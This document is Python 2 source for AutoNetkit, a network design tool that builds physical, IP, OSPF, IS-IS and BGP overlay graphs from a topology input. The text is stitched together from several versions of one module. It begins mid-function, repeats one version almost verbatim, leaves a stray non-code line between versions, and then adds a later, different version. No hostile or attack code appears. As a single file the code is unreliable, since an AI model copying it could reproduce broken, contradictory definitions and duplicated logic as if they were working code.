settings['General']['deploy'] = True
settings['Deploy Hosts']['internal'] = {
'cisco': {
'deploy': True,
},
}
#TODO: make this more explicit than overloading add_overlay - make it load_graph or something similar
input_undirected = nx.Graph(input_graph)
for node in input_graph:
#del input_graph.node[node]['router config']
#del input_graph.node[node]['device_subtype']
pass
#nx.write_graphml(input_graph, "output.graphml")
G_in = anm.add_overlay("input", input_undirected)
#G_in_directed = anm.add_overlay("input_directed", input_graph, directed = True)
import autonetkit.plugins.graph_product as graph_product
graph_product.expand(G_in) # apply graph products if relevant
if len(ank.unique_attr(G_in, "asn")) > 1:
# Multiple ASNs set, use label format device.asn
anm.set_node_label(".", ['label', 'pop', 'asn'])
#TODO: remove, used for demo on nectar
#for node in G_in:
#node.platform = "netkit"
#node.host = "nectar1"
#G_in.data.igp = "ospf"
# set syntax for routers according to platform
#TODO: make these defaults
G_in.update(G_in.nodes("is_router", platform = "junosphere"), syntax="junos")
G_in.update(G_in.nodes("is_router", platform = "dynagen"), syntax="ios")
G_in.update(G_in.nodes("is_router", platform = "netkit"), syntax="quagga")
G_in.update(G_in.nodes("is_router", platform = "cisco"), syntax="ios")
G_graphics = anm.add_overlay("graphics") # plotting data
G_graphics.add_nodes_from(G_in, retain=['x', 'y', 'device_type', 'device_subtype', 'pop', 'asn'])
build_phy(anm)
#update_pika(anm)
#build_conn(anm)
build_ip(anm)
igp = G_in.data.igp or "ospf" #TODO: make default template driven
#TODO: make the global igp be set on each node - this way can also support different IGPs per router
# Add overlays even if not used: simplifies compiler where can check for presence in overlay (if blank not present, don't configure ospf etc)
anm.add_overlay("ospf")
anm.add_overlay("isis")
if igp == "ospf":
build_ospf(anm)
if igp == "isis":
build_isis(anm)
build_bgp(anm)
return anm
def build_bgp(anm):
# eBGP
G_phy = anm['phy']
G_in = anm['input']
G_bgp = anm.add_overlay("bgp", directed = True)
G_bgp.add_nodes_from(G_in.nodes("is_router"))
ebgp_edges = [edge for edge in G_in.edges() if not edge.attr_equal("asn")]
G_bgp.add_edges_from(ebgp_edges, bidirectional = True, type = 'ebgp')
# now iBGP
if len(G_phy) < 500:
# full mesh
for asn, devices in G_phy.groupby("asn").items():
routers = [d for d in devices if d.is_router]
ibgp_edges = [ (s, t) for s in routers for t in routers if s!=t]
G_bgp.add_edges_from(ibgp_edges, type = 'ibgp')
else:
import autonetkit.plugins.route_reflectors as route_reflectors
route_reflectors.allocate(G_phy, G_bgp)
#TODO: probably want to use l3 connectivity graph for allocating route reflectors
ebgp_nodes = [d for d in G_bgp if any(edge.type == 'ebgp' for edge in d.edges())]
G_bgp.update(ebgp_nodes, ebgp=True)
def build_ip(anm):
import autonetkit.plugins.ip as ip
G_ip = anm.add_overlay("ip")
G_in = anm['input']
G_graphics = anm['graphics']
G_phy = anm['phy']
G_ip.add_nodes_from(G_in)
G_ip.add_edges_from(G_in.edges(type="physical"))
ank.aggregate_nodes(G_ip, G_ip.nodes("is_switch"), retain = "edge_id")
#TODO: add function to update edge properties: can overload node update?
edges_to_split = [edge for edge in G_ip.edges() if edge.attr_both("is_l3device")]
split_created_nodes = list(ank.split(G_ip, edges_to_split, retain='edge_id'))
for node in split_created_nodes:
node['graphics'].x = ank.neigh_average(G_ip, node, "x", G_graphics)
node['graphics'].y = ank.neigh_average(G_ip, node, "y", G_graphics)
node['graphics'].asn = ank.neigh_most_frequent(G_ip, node, "asn", G_phy) # arbitrary choice
#TODO: could choose largest ASN if tie break
#TODO: see if need G_phy - should auto fall through to phy for ASN
switch_nodes = G_ip.nodes("is_switch")# regenerate due to aggregated
G_ip.update(switch_nodes, collision_domain=True) # switches are part of collision domain
G_ip.update(split_created_nodes, collision_domain=True)
# Assign collision domain to a host if all neighbours from same host
for node in split_created_nodes:
if ank.neigh_equal(G_ip, node, "host", G_phy):
node.host = ank.neigh_attr(G_ip, node, "host", G_phy).next() # first attribute
# set collision domain IPs
#TODO: trim next line
collision_domain_id = itertools.count(0)
for node in G_ip.nodes("collision_domain"):
graphics_node = G_graphics.node(node)
graphics_node.device_type = "collision_domain"
cd_id = collision_domain_id.next()
node.cd_id = cd_id
#TODO: Use this label
if not node.is_switch:
label = "_".join(sorted(ank.neigh_attr(G_ip, node, "label", G_phy)))
cd_label = "cd_%s" % label # switches keep their names
node.label = cd_label
node.cd_id = cd_label
graphics_node.label = cd_label
ip.allocate_ips(G_ip)
ank.save(G_ip)
def build_phy(anm):
G_in = anm['input']
G_phy = anm['phy']
G_phy.add_nodes_from(G_in, retain=['label', 'update', 'device_type', 'device_subtype', 'asn', 'platform', 'host', 'syntax'])
if G_in.data.Creator == "Topology Zoo Toolset":
ank.copy_attr_from(G_in, G_phy, "Network") #TODO: move this into graphml (and later gml) reader
G_phy.add_edges_from(G_in.edges(type="physical"))
def build_conn(anm):
G_in = anm['input']
G_phy = anm['phy']
G_conn = anm.add_overlay("conn", directed = True)
G_conn.add_nodes_from(G_in, retain=['label'])
G_conn.add_edges_from(G_in.edges(type="physical"))
#if G_in.data.Creator == "Maestro":
#ank.copy_edge_attr_from(G_in, G_conn, "index")
return
import autonetkit.allocate_hardware
autonetkit.allocate_hardware.allocate(anm)
G_graphics = anm['graphics']
new_nodes = set(G_conn) - set(G_phy)
#G_graphics.add_nodes_from(new_nodes, retain = ['x', 'y', 'asn', "device_type", "device_subtype"])
for node in new_nodes:
G_graphics.add_node(node, retain = ['x', 'y', 'asn', "device_type", "device_subtype"])
#print node['graphics'].dump()
#TODO: Add a function to auto-update graphics, if any node present in overlay but not in graphics then add with sensible defaults
def build_ospf(anm):
"""
Build OSPF graph.
Allowable area combinations:
0 -> 0
0 -> x (x!= 0)
x -> 0 (x!= 0)
x -> x (x != 0)
Not-allowed:
x -> x (x != y != 0)
"""
G_in = anm['input']
G_ospf = anm.add_overlay("ospf")
G_ospf.add_nodes_from(G_in.nodes("is_router"), retain=['asn'])
G_ospf.add_nodes_from(G_in.nodes("is_switch"), retain=['asn'])
G_ospf.add_edges_from(G_in.edges(), retain = ['edge_id'])
ank.copy_attr_from(G_in, G_ospf, "ospf_area", dst_attr = "area") #TODO: move this into graphml (and later gml) reader
ank.aggregate_nodes(G_ospf, G_ospf.nodes("is_switch"), retain = "edge_id")
ank.explode_nodes(G_ospf, G_ospf.nodes("is_switch"), retain= "edge_id")
G_ospf.remove_edges_from([link for link in G_ospf.edges() if link.src.asn != link.dst.asn]) # remove inter-AS links
for router in G_ospf:
if router.area == "None":
#TODO: tidy up this default of None being a string
router.area = 0
router.area = int(router.area) #TODO: use dst type in copy_attr_from
# list type
for router in G_ospf:
neigh_areas = set(ank.neigh_attr(G_ospf, router, "area"))
if len(neigh_areas) == 1:
# All neighbors have same area
neigh_area = neigh_areas.pop()
if neigh_area != router.area:
# router is in own area
if router.area == 0:
router.type = "Backbone ABR" # case of single backbone ABR
else:
router.type = "ABR"
elif neigh_area == 0:
# all neighbors are in area 0
router.type = "Backbone"
else:
router.type = "Internal"
else:
if router.area == 0:
router.type = "Backbone ABR"
else:
router.type = "ABR"
#TOOD: set default area, or warn if no area settings
for router in G_ospf:
# and set area on interface
for edge in router.edges():
if edge.area:
continue # already allocated (from other "direction", as undirected)
if router.area == edge.dst.area:
edge.area = router.area # intra-area
else:
if router.area == 0 or edge.dst.area == 0:
# backbone to other area
if router.area == 0:
edge.area = edge.dst.area # router in backbone, use other area
else:
edge.area = router.area # router not in backbone, use its area
#
#TODO: do we want to allocate non-symmetric OSPF costs? do we need a directed OSPF graph?
# (note this will all change once have proper interface nodes)
for link in G_ospf.edges():
link.cost = 1
def ip_to_net_ent_title_ios(ip):
""" Converts an IP address into an OSI Network Entity Title
suitable for use in IS-IS on IOS.
>>> ip_to_net_ent_title_ios(IPAddress("192.168.19.1"))
'49.1921.6801.9001.00'
"""
try:
ip_words = ip.words
except AttributeError:
import netaddr # try to cast to IP Address
ip = netaddr.IPAddress(ip)
ip_words = ip.words
log.debug("Converting IP to OSI ENT format")
area_id = "49"
ip_octets = "".join("%03d" % int(octet) for octet in ip_words) # single string, padded if needed
return ".".join([area_id, ip_octets[0:4], ip_octets[4:8], ip_octets[8:12], "00"])
def build_isis(anm):
G_in = anm['input']
G_ip = anm['ip']
G_isis = anm.add_overlay("isis")
#G_isis.add_nodes_from(G_in.nodes("is_router", igp = "isis"), retain=['asn'])
#TODO: filter only igp=isis nodes, set the igp as a default in build_network
G_isis.add_nodes_from(G_in.nodes("is_router"), retain=['asn'])
G_isis.add_nodes_from(G_in.nodes("is_switch"), retain=['asn'])
G_isis.add_edges_from(G_in.edges(), retain = ['edge_id'])
# Merge and explode switches
ank.aggregate_nodes(G_isis, G_isis.nodes("is_switch"), retain = "edge_id")
ank.explode_nodes(G_isis, G_isis.nodes("is_switch"), retain = "edge_id")
G_isis.remove_edges_from([link for link in G_isis.edges() if link.src.asn != link.dst.asn])
for node in G_isis:
ip_node = G_ip.node(node)
node.net = ip_to_net_ent_title_ios(ip_node.loopback)
node.process_id = 1 # default
for link in G_isis.edges():
link.metric = 1 # default
def update_pika(anm):
log.debug("Sending anm to pika")
body = autonetkit.ank_json.dumps(anm, None)
pika_channel.publish_compressed("www", "client", body)
set syntax from config defaults
import autonetkit
import autonetkit.anm
import autonetkit.ank as ank
import itertools
import autonetkit.ank_pika
import autonetkit.config
settings = autonetkit.config.settings
import autonetkit.log as log
import autonetkit.load.graphml as graphml
import autonetkit.exception
import networkx as nx
import os
__all__ = ['build']
rabbitmq_server = settings['Rabbitmq']['server']
pika_channel = autonetkit.ank_pika.AnkPika(rabbitmq_server)
#TODO: seperate out load and build - build should take a ready made nx graph and work from there.... load should do file handling error checking etc
# Also makes automated testing easier!
def build(input_graph_string, timestamp):
#TODO: move this out of main console wrapper
anm = autonetkit.anm.AbstractNetworkModel()
try:
input_graph = graphml.load_graphml(input_graph_string)
except autonetkit.exception.AnkIncorrectFileFormat:
# try a different reader
try:
import autonetkit.load.worm as worm
except ImportError:
return # module not present (development module)
input_graph = worm.load(input_graph_string)
# add local deployment host
settings['General']['deploy'] = True
settings['Deploy Hosts']['internal'] = {
'cisco': {
'deploy': True,
},
}
#TODO: make this more explicit than overloading add_overlay - make it load_graph or something similar
input_undirected = nx.Graph(input_graph)
for node in input_graph:
#del input_graph.node[node]['router config']
#del input_graph.node[node]['device_subtype']
pass
#nx.write_graphml(input_graph, "output.graphml")
G_in = anm.add_overlay("input", input_undirected)
#G_in_directed = anm.add_overlay("input_directed", input_graph, directed = True)
import autonetkit.plugins.graph_product as graph_product
graph_product.expand(G_in) # apply graph products if relevant
if len(ank.unique_attr(G_in, "asn")) > 1:
# Multiple ASNs set, use label format device.asn
anm.set_node_label(".", ['label', 'pop', 'asn'])
#TODO: remove, used for demo on nectar
#for node in G_in:
#node.platform = "netkit"
#node.host = "nectar1"
#G_in.data.igp = "ospf"
# set syntax for routers according to platform
#TODO: make these defaults
G_in.update(G_in.nodes("is_router", platform = "junosphere"), syntax="junos")
G_in.update(G_in.nodes("is_router", platform = "dynagen"), syntax="ios")
G_in.update(G_in.nodes("is_router", platform = "netkit"), syntax="quagga")
#G_in.update(G_in.nodes("is_router", platform = "cisco"), syntax="ios2")
G_graphics = anm.add_overlay("graphics") # plotting data
G_graphics.add_nodes_from(G_in, retain=['x', 'y', 'device_type', 'device_subtype', 'pop', 'asn'])
build_phy(anm)
#update_pika(anm)
#build_conn(anm)
build_ip(anm)
igp = G_in.data.igp or "ospf" #TODO: make default template driven
#TODO: make the global igp be set on each node - this way can also support different IGPs per router
# Add overlays even if not used: simplifies compiler where can check for presence in overlay (if blank not present, don't configure ospf etc)
anm.add_overlay("ospf")
anm.add_overlay("isis")
if igp == "ospf":
build_ospf(anm)
if igp == "isis":
build_isis(anm)
build_bgp(anm)
return anm
def build_bgp(anm):
# eBGP
G_phy = anm['phy']
G_in = anm['input']
G_bgp = anm.add_overlay("bgp", directed = True)
G_bgp.add_nodes_from(G_in.nodes("is_router"))
ebgp_edges = [edge for edge in G_in.edges() if not edge.attr_equal("asn")]
G_bgp.add_edges_from(ebgp_edges, bidirectional = True, type = 'ebgp')
# now iBGP
if len(G_phy) < 500:
# full mesh
for asn, devices in G_phy.groupby("asn").items():
routers = [d for d in devices if d.is_router]
ibgp_edges = [ (s, t) for s in routers for t in routers if s!=t]
G_bgp.add_edges_from(ibgp_edges, type = 'ibgp')
else:
import autonetkit.plugins.route_reflectors as route_reflectors
route_reflectors.allocate(G_phy, G_bgp)
#TODO: probably want to use l3 connectivity graph for allocating route reflectors
ebgp_nodes = [d for d in G_bgp if any(edge.type == 'ebgp' for edge in d.edges())]
G_bgp.update(ebgp_nodes, ebgp=True)
def build_ip(anm):
import autonetkit.plugins.ip as ip
G_ip = anm.add_overlay("ip")
G_in = anm['input']
G_graphics = anm['graphics']
G_phy = anm['phy']
G_ip.add_nodes_from(G_in)
G_ip.add_edges_from(G_in.edges(type="physical"))
ank.aggregate_nodes(G_ip, G_ip.nodes("is_switch"), retain = "edge_id")
#TODO: add function to update edge properties: can overload node update?
edges_to_split = [edge for edge in G_ip.edges() if edge.attr_both("is_l3device")]
split_created_nodes = list(ank.split(G_ip, edges_to_split, retain='edge_id'))
for node in split_created_nodes:
node['graphics'].x = ank.neigh_average(G_ip, node, "x", G_graphics)
node['graphics'].y = ank.neigh_average(G_ip, node, "y", G_graphics)
node['graphics'].asn = ank.neigh_most_frequent(G_ip, node, "asn", G_phy) # arbitrary choice
#TODO: could choose largest ASN if tie break
#TODO: see if need G_phy - should auto fall through to phy for ASN
switch_nodes = G_ip.nodes("is_switch")# regenerate due to aggregated
G_ip.update(switch_nodes, collision_domain=True) # switches are part of collision domain
G_ip.update(split_created_nodes, collision_domain=True)
# Assign collision domain to a host if all neighbours from same host
for node in split_created_nodes:
if ank.neigh_equal(G_ip, node, "host", G_phy):
node.host = ank.neigh_attr(G_ip, node, "host", G_phy).next() # first attribute
# set collision domain IPs
#TODO: trim next line
collision_domain_id = itertools.count(0)
for node in G_ip.nodes("collision_domain"):
graphics_node = G_graphics.node(node)
graphics_node.device_type = "collision_domain"
cd_id = collision_domain_id.next()
node.cd_id = cd_id
#TODO: Use this label
if not node.is_switch:
label = "_".join(sorted(ank.neigh_attr(G_ip, node, "label", G_phy)))
cd_label = "cd_%s" % label # switches keep their names
node.label = cd_label
node.cd_id = cd_label
graphics_node.label = cd_label
ip.allocate_ips(G_ip)
ank.save(G_ip)
def build_phy(anm):
G_in = anm['input']
G_phy = anm['phy']
G_phy.add_nodes_from(G_in, retain=['label', 'update', 'device_type', 'device_subtype', 'asn', 'platform', 'host', 'syntax'])
if G_in.data.Creator == "Topology Zoo Toolset":
ank.copy_attr_from(G_in, G_phy, "Network") #TODO: move this into graphml (and later gml) reader
G_phy.add_edges_from(G_in.edges(type="physical"))
def build_conn(anm):
G_in = anm['input']
G_phy = anm['phy']
G_conn = anm.add_overlay("conn", directed = True)
G_conn.add_nodes_from(G_in, retain=['label'])
G_conn.add_edges_from(G_in.edges(type="physical"))
#if G_in.data.Creator == "Maestro":
#ank.copy_edge_attr_from(G_in, G_conn, "index")
return
import autonetkit.allocate_hardware
autonetkit.allocate_hardware.allocate(anm)
G_graphics = anm['graphics']
new_nodes = set(G_conn) - set(G_phy)
#G_graphics.add_nodes_from(new_nodes, retain = ['x', 'y', 'asn', "device_type", "device_subtype"])
for node in new_nodes:
G_graphics.add_node(node, retain = ['x', 'y', 'asn', "device_type", "device_subtype"])
#print node['graphics'].dump()
#TODO: Add a function to auto-update graphics, if any node present in overlay but not in graphics then add with sensible defaults
def build_ospf(anm):
"""
Build OSPF graph.
Allowable area combinations:
0 -> 0
0 -> x (x!= 0)
x -> 0 (x!= 0)
x -> x (x != 0)
Not-allowed:
x -> x (x != y != 0)
"""
G_in = anm['input']
G_ospf = anm.add_overlay("ospf")
G_ospf.add_nodes_from(G_in.nodes("is_router"), retain=['asn'])
G_ospf.add_nodes_from(G_in.nodes("is_switch"), retain=['asn'])
G_ospf.add_edges_from(G_in.edges(), retain = ['edge_id'])
ank.copy_attr_from(G_in, G_ospf, "ospf_area", dst_attr = "area") #TODO: move this into graphml (and later gml) reader
ank.aggregate_nodes(G_ospf, G_ospf.nodes("is_switch"), retain = "edge_id")
ank.explode_nodes(G_ospf, G_ospf.nodes("is_switch"), retain= "edge_id")
G_ospf.remove_edges_from([link for link in G_ospf.edges() if link.src.asn != link.dst.asn]) # remove inter-AS links
for router in G_ospf:
if router.area == "None":
#TODO: tidy up this default of None being a string
router.area = 0
router.area = int(router.area) #TODO: use dst type in copy_attr_from
# list type
for router in G_ospf:
neigh_areas = set(ank.neigh_attr(G_ospf, router, "area"))
if len(neigh_areas) == 1:
# All neighbors have same area
neigh_area = neigh_areas.pop()
if neigh_area != router.area:
# router is in own area
if router.area == 0:
router.type = "Backbone ABR" # case of single backbone ABR
else:
router.type = "ABR"
elif neigh_area == 0:
# all neighbors are in area 0
router.type = "Backbone"
else:
router.type = "Internal"
else:
if router.area == 0:
router.type = "Backbone ABR"
else:
router.type = "ABR"
#TOOD: set default area, or warn if no area settings
for router in G_ospf:
# and set area on interface
for edge in router.edges():
if edge.area:
continue # already allocated (from other "direction", as undirected)
if router.area == edge.dst.area:
edge.area = router.area # intra-area
else:
if router.area == 0 or edge.dst.area == 0:
# backbone to other area
if router.area == 0:
edge.area = edge.dst.area # router in backbone, use other area
else:
edge.area = router.area # router not in backbone, use its area
#
#TODO: do we want to allocate non-symmetric OSPF costs? do we need a directed OSPF graph?
# (note this will all change once have proper interface nodes)
for link in G_ospf.edges():
link.cost = 1
def ip_to_net_ent_title_ios(ip):
""" Converts an IP address into an OSI Network Entity Title
suitable for use in IS-IS on IOS.
>>> ip_to_net_ent_title_ios(IPAddress("192.168.19.1"))
'49.1921.6801.9001.00'
"""
try:
ip_words = ip.words
except AttributeError:
import netaddr # try to cast to IP Address
ip = netaddr.IPAddress(ip)
ip_words = ip.words
log.debug("Converting IP to OSI ENT format")
area_id = "49"
ip_octets = "".join("%03d" % int(octet) for octet in ip_words) # single string, padded if needed
return ".".join([area_id, ip_octets[0:4], ip_octets[4:8], ip_octets[8:12], "00"])
def build_isis(anm):
G_in = anm['input']
G_ip = anm['ip']
G_isis = anm.add_overlay("isis")
#G_isis.add_nodes_from(G_in.nodes("is_router", igp = "isis"), retain=['asn'])
#TODO: filter only igp=isis nodes, set the igp as a default in build_network
G_isis.add_nodes_from(G_in.nodes("is_router"), retain=['asn'])
G_isis.add_nodes_from(G_in.nodes("is_switch"), retain=['asn'])
G_isis.add_edges_from(G_in.edges(), retain = ['edge_id'])
# Merge and explode switches
ank.aggregate_nodes(G_isis, G_isis.nodes("is_switch"), retain = "edge_id")
ank.explode_nodes(G_isis, G_isis.nodes("is_switch"), retain = "edge_id")
G_isis.remove_edges_from([link for link in G_isis.edges() if link.src.asn != link.dst.asn])
for node in G_isis:
ip_node = G_ip.node(node)
node.net = ip_to_net_ent_title_ios(ip_node.loopback)
node.process_id = 1 # default
for link in G_isis.edges():
link.metric = 1 # default
def update_pika(anm):
log.debug("Sending anm to pika")
body = autonetkit.ank_json.dumps(anm, None)
pika_channel.publish_compressed("www", "client", body)
|
"""Module to build overlay graphs for network design"""
import itertools
import autonetkit
import autonetkit.ank as ank_utils
import autonetkit.ank_messaging as ank_messaging
import autonetkit.anm
import autonetkit.config
import autonetkit.exception
import autonetkit.load.graphml as graphml
import autonetkit.log as log
import networkx as nx
from autonetkit.exception import AutoNetkitException
SETTINGS = autonetkit.config.settings
#TODO: revisit phy_neighbors for eg ASN and use l3_conn instead
#TODO: note that build network now assumes input graph has interface mappings on nodes/edges
__all__ = ['build']
from autonetkit.ank_utils import call_log
@call_log
def load(input_graph_string):
#TODO: look at XML header for file type
try:
input_graph = graphml.load_graphml(input_graph_string)
except autonetkit.exception.AnkIncorrectFileFormat:
# try a different reader
try:
from autonetkit_cisco import load as cisco_load
except ImportError, e:
log.debug("Unable to load autonetkit_cisco %s" % e)
return # module not present (development module)
else:
input_graph = cisco_load.load(input_graph_string)
# add local deployment host
SETTINGS['General']['deploy'] = True
SETTINGS['Deploy Hosts']['internal'] = {
'VIRL': {
'deploy': True,
},
}
return input_graph
@call_log
def grid_2d(dim):
"""Creates a 2d grid of dimension dim"""
graph = nx.grid_2d_graph(dim, dim)
for node in graph:
graph.node[node]['asn'] = 1
graph.node[node]['x'] = node[0] * 150
graph.node[node]['y'] = node[1] * 150
graph.node[node]['device_type'] = 'router'
graph.node[node]['platform'] = 'cisco'
graph.node[node]['syntax'] = 'ios_xr'
graph.node[node]['host'] = 'internal'
graph.node[node]['ibgp_role'] = "Peer"
mapping = {node: "%s_%s" % (node[0], node[1]) for node in graph}
# Networkx wipes data if remap with same labels
nx.relabel_nodes(graph, mapping, copy=False)
for index, (src, dst) in enumerate(graph.edges()):
graph[src][dst]['type'] = "physical"
# add global index for sorting
SETTINGS['General']['deploy'] = True
SETTINGS['Deploy Hosts']['internal'] = {
'cisco': {
'deploy': True,
},
}
return graph
@call_log
def initialise(input_graph):
"""Initialises the input graph with from a NetworkX graph"""
anm = autonetkit.anm.AbstractNetworkModel()
input_undirected = nx.Graph(input_graph)
g_in = anm.add_overlay("input", graph=input_undirected)
# set defaults
if not g_in.data.specified_int_names:
# if not specified then automatically assign interface names
g_in.data.specified_int_names = False
#import autonetkit.plugins.graph_product as graph_product
#graph_product.expand(g_in) # apply graph products if relevant
expand_fqdn = False
# TODO: make this set from config and also in the input file
if expand_fqdn and len(ank_utils.unique_attr(g_in, "asn")) > 1:
# Multiple ASNs set, use label format device.asn
anm.set_node_label(".", ['label', 'asn'])
g_in.update(g_in.routers(platform="junosphere"), syntax="junos")
g_in.update(g_in.routers(platform="dynagen"), syntax="ios")
g_in.update(g_in.routers(platform="netkit"), syntax="quagga")
#TODO: is this used?
g_in.update(g_in.servers(platform="netkit"), syntax="quagga")
autonetkit.ank.set_node_default(g_in, specified_int_names=None)
g_graphics = anm.add_overlay("graphics") # plotting data
g_graphics.add_nodes_from(g_in, retain=['x', 'y', 'device_type',
'label', 'device_subtype', 'asn'])
if g_in.data.Creator == "VIRL":
#TODO: move this to other module
# Multiple ASNs set, use label format device.asn
#anm.set_node_label(".", ['label_full'])
pass
return anm
@call_log
def check_server_asns(anm):
"""Checks that servers have appropriate ASN allocated.
Warns and auto-corrects servers which are connected to routers of a difference AS.
#TODO: provide manual over-ride for this auto-correct.
"""
#TODO: Move to validate module?
g_phy = anm['phy']
for server in g_phy.servers():
if server.device_subtype in ("SNAT", "FLAT"):
continue # Don't warn on ASN for NAT elements
l3_neighbors = list(server['l3_conn'].neighbors())
l3_neighbor_asns = set(n.asn for n in l3_neighbors)
if server.asn not in l3_neighbor_asns:
neighs_with_asn = ["%s: AS %s" % (n, n.asn)
for n in l3_neighbors] # tuples for warning message
server.log.warning("Server does not belong to same ASN as neighbors %s" % (neighs_with_asn))
if len(l3_neighbors) == 1:
# single ASN of neighbor -> auto correct
if server['input'].default_asn:
neigh_asn = l3_neighbor_asns.pop()
log.warning("Updating server %s AS from %s to %s" % (server, server.asn, neigh_asn))
server.asn = neigh_asn
else:
log.info("Server %s ASN %s explictly set by user, not auto-correcting" %
(server, server.asn))
@call_log
def apply_design_rules(anm):
"""Applies appropriate design rules to ANM"""
g_in = anm['input']
build_phy(anm)
g_phy = anm['phy']
#autonetkit.update_http(anm)
build_l3_connectivity(anm)
check_server_asns(anm)
#autonetkit.update_http(anm)
from autonetkit.design.mpls import build_vrf
build_vrf(anm) # need to do before to add loopbacks before ip allocations
from autonetkit.design.ip import build_ip, build_ipv4, build_ipv6
build_ip(anm) # ip infrastructure topology
#TODO: set defaults at the start, rather than inline, ie set g_in.data.address_family then use later
address_family = g_in.data.address_family or "v4" # default is v4
#TODO: can remove the infrastructure now create g_ip seperately
if address_family == "None":
log.info("IP addressing disabled, disabling routing protocol configuration")
anm['phy'].data.enable_routing = False
if address_family == "None":
log.info("IP addressing disabled, skipping IPv4")
anm.add_overlay("ipv4") # create empty so rest of code follows through
g_phy.update(g_phy, use_ipv4 = False)
elif address_family in ("v4", "dual_stack"):
build_ipv4(anm, infrastructure = True)
g_phy.update(g_phy, use_ipv4 = True)
elif address_family == "v6":
# Allocate v4 loopbacks for router ids
build_ipv4(anm, infrastructure = False)
g_phy.update(g_phy, use_ipv4 = False)
#TODO: Create a collision domain overlay for ip addressing - l2 overlay?
if address_family == "None":
log.info("IP addressing disabled, not allocating IPv6")
anm.add_overlay("ipv6") # create empty so rest of code follows through
g_phy.update(g_phy, use_ipv6 = False)
elif address_family in ("v6", "dual_stack"):
build_ipv6(anm)
g_phy.update(g_phy, use_ipv6 = True)
else:
anm.add_overlay("ipv6") # placeholder for compiler logic
default_igp = g_in.data.igp or "ospf"
ank_utils.set_node_default(g_in, igp=default_igp)
ank_utils.copy_attr_from(g_in, g_phy, "include_csr")
try:
from autonetkit_cisco import build_network as cisco_build_network
except ImportError, e:
log.debug("Unable to load autonetkit_cisco %s" % e)
else:
cisco_build_network.pre_design(anm)
from autonetkit.design.igp import build_ospf, build_eigrp, build_isis
build_ospf(anm)
build_eigrp(anm)
build_isis(anm)
from autonetkit.design.bgp import build_bgp
build_bgp(anm)
#autonetkit.update_http(anm)
from autonetkit.design.mpls import mpls_te, mpls_oam
mpls_te(anm)
mpls_oam(anm)
# post-processing
if anm['phy'].data.enable_routing:
from autonetkit.design.mpls import mark_ebgp_vrf, build_ibgp_vpn_v4
mark_ebgp_vrf(anm)
build_ibgp_vpn_v4(anm) # build after bgp as is based on
#autonetkit.update_http(anm)
try:
from autonetkit_cisco import build_network as cisco_build_network
except ImportError, e:
log.debug("Unable to load autonetkit_cisco %s" % e)
else:
cisco_build_network.post_design(anm)
return anm
@call_log
def build(input_graph):
"""Main function to build network overlay topologies"""
anm = None
try:
anm = initialise(input_graph)
anm = apply_design_rules(anm)
#print {str(node): {'x': node.x, 'y': node.y} for node in anm['input']}
import autonetkit
autonetkit.update_http(anm)
except Exception, e:
# Send the visualisation to help debugging
import autonetkit
try:
autonetkit.update_http(anm)
except Exception, e:
# problem with vis -> could be coupled with original exception - raise original
log.warning("Unable to visualise: %s" % e)
raise # raise the original exception
return anm
def remove_parallel_switch_links(anm):
g_phy = anm['phy']
subs = ank_utils.connected_subgraphs(g_phy, g_phy.switches())
for component in subs:
log.debug("Checking for multiple links to switch cluster %s" % str(sorted(component)))
# Collect all links into this cluster
external_edges = []
for switch in component:
for edge in switch.edges():
if edge.dst not in component:
external_edges.append(edge)
# Group by the node they link to
from collections import defaultdict
check_dict = defaultdict(list)
for edge in external_edges:
check_dict[edge.dst].append(edge)
# Check to see if any nodes have more than one link into this aggregate
for dst, edges in check_dict.items():
if len(edges) > 1:
edges_to_remove = sorted(edges)[1:] # remove all but first
interfaces = ", ".join(sorted(str(edge.dst_int['phy']) for edge in edges))
interfaces_to_disconnect = ", ".join(sorted(str(edge.dst_int['phy']) for edge in edges_to_remove))
dst.log.warning("Multiple edges exist to same switch cluster: %s (%s). Removing edges from interfaces %s" % (
str(sorted(component)), interfaces, interfaces_to_disconnect))
g_phy.remove_edges_from(edges_to_remove)
@call_log
def build_phy(anm):
"""Build physical overlay"""
g_in = anm['input']
g_phy = anm['phy']
g_phy.data.enable_routing = g_in.data.enable_routing
if g_phy.data.enable_routing is None:
g_in.data.enable_routing = True # default if not set
g_phy.add_nodes_from(g_in, retain=['label', 'update', 'device_type', 'asn',
'specified_int_names',
'device_subtype', 'platform', 'host', 'syntax'])
if g_in.data.Creator == "Topology Zoo Toolset":
ank_utils.copy_attr_from(g_in, g_phy, "Network")
ank_utils.set_node_default(g_phy, Network=None)
g_phy.add_edges_from(g_in.edges(type="physical"))
# TODO: make this automatic if adding to the physical graph?
if g_in.data.Creator == "VIRL":
g_phy.data.mgmt_interfaces_enabled = g_in.data.mgmt_interfaces_enabled
#TODO: remove this code now allocated externally
g_phy.data.mgmt_address_start = g_in.data.mgmt_address_start
g_phy.data.mgmt_address_end = g_in.data.mgmt_address_end
g_phy.data.mgmt_prefixlen = g_in.data.mgmt_prefixlen
g_phy.data.mgmt_prefixlen = g_in.data.mgmt_prefixlen
ank_utils.copy_attr_from(g_in, g_phy, "use_cdp")
ank_utils.copy_attr_from(g_in, g_phy, "use_onepk")
ank_utils.copy_attr_from(g_in, g_phy, "label_full")
ank_utils.copy_attr_from(g_in, g_phy, "indices")
ank_utils.copy_attr_from(g_in, g_phy, "dont_configure_static_routing")
ank_utils.copy_attr_from(g_in, g_phy, "server_username")
ank_utils.copy_attr_from(g_in, g_phy, "server_ssh_key")
ank_utils.set_node_default(g_phy, use_ipv4 = False, use_ipv6=False)
g_phy.allocate_interfaces()
for node in g_phy:
for interface in node:
specified_id = interface['input'].get("specified_id")
if specified_id:
interface.specified_id = specified_id # map across
remove_parallel_switch_links(anm)
@call_log
def build_l3_connectivity(anm):
""" creates l3_connectivity graph, which is switch nodes aggregated and exploded"""
#TODO: use this as base for ospf, ebgp, ip, etc rather than exploding in each
g_in = anm['input']
g_l3conn = anm.add_overlay("l3_conn")
g_l3conn.add_nodes_from(g_in, retain=['label', 'update', 'device_type', 'asn',
'specified_int_names',
'device_subtype', 'platform', 'host', 'syntax'])
g_l3conn.add_nodes_from(g_in.switches(), retain=['asn'])
g_l3conn.add_edges_from(g_in.edges())
ank_utils.aggregate_nodes(g_l3conn, g_l3conn.switches())
exploded_edges = ank_utils.explode_nodes(g_l3conn,
g_l3conn.switches())
for edge in exploded_edges:
edge.multipoint = True
edge.src_int.multipoint = True
edge.dst_int.multipoint = True
@call_log
def build_conn(anm):
"""Build connectivity overlay"""
g_in = anm['input']
g_conn = anm.add_overlay("conn", directed=True)
g_conn.add_nodes_from(g_in, retain=['label'])
